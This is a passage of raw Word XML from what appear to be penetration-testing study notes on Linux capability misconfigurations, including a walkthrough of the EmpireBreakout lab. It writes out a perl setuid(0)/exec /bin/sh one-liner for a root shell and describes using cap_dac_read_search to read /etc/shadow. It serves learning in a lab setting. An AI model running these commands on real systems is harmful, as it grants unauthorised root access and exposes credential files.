        <w:t xml:space="preserve">, filtering out any errors from the terminal output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002376">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002377">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002378">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80" name="image65.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image65.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId743"/>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2379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two perl binaries stand out as they have setuid capabilities enabled, along with the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> +ep flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specifying that these capabilities are</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> effective </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Effective (E) and Permitted (P) → the capability is active and the program can use it when executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Permitted only → the capability is allowed but not currently in effect unless explicitly enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Effective only → rare, means it’s active but not necessarily permitted for all operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000237F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No flags</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → the capability is not set at all.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002380">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002381">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though they seem similar, capabilities, setuid, and the setuid flag are located in different places within the Linux ELF file format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002382">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002383">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit this capability misconfiguration, we could check the GTFOBins website. This site provides an organized list of UNIX binaries and how can they be misused to elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002384">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002385">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching for "Perl" on the GTFOBins website, we'll find precise instructions for which command to use to exploit capabilities. We'll use the whole command, which executes a shell along with a few POSIX directives enabling setuid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002386">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002387">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="349" name="image341.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image341.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74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2388">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002389">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We managed to gain a root shell via yet another misconfiguration vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qy2v5sn4nswu" w:id="314"/>
      <w:bookmarkEnd w:id="314"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000238F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002390">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId745">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EmpireBreakout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had to use these capabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002391">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002392">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you might have seen in the previous screenshot, the we can see the single file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which is in fact and executable (called ELF). We can confirm this with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002393">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="482600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId746"/>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2394">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002395">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002396">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002397">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="72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getcap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the command that will show us any capabilities set for executables and files on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002398">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="72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-r /</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Makes the check recursive from the root file, so checks everything.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002399">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Will throw any errors that appear into the 'bin' before they come to standard output, keeping the console tidy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3157538" cy="520276"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="239" name="image231.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image231.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId747"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3157538" cy="520276"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the image we can see that the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executable has the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_read_search=ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I think the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means 'effective and permitted'. If we look at the capabilities manual page it says that this specific capability allows "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass file read permission checks and directory read and execute permission checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" … Yes please, don't mind if I do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, now armed with this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command that can bypass file read permissions etc, we can start grabbing files we shouldn't normally see…Such as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file…Spoiler, still didn't get the password from this, but it was a good idea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, you need to do some manual enumeration until you find the </w:t>
      </w:r>
